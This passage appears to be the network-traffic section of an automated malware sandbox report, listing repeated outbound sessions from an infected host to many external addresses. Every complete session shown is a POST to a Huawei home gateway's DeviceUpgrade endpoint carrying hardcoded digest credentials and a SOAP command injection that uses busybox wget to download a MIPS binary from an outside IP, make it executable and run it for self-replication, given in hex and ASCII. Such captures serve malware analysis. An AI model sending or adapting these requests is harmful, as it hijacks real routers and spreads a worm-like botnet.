6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  77192.168.2.1350346221.14.147.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653441906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  78192.168.2.1347070157.23.28.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653441906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  79192.168.2.1360896157.43.178.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653495073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  80192.168.2.1355212167.226.60.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653497934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  81192.168.2.1348368197.78.23.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653532982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  82192.168.2.133467250.238.101.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653539896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  83192.168.2.134161641.27.132.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653542995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  84192.168.2.1339576205.5.188.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653562069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  85192.168.2.135812074.129.64.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653641939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  86192.168.2.135891841.122.176.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653642893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  87192.168.2.1356068157.192.216.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653662920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
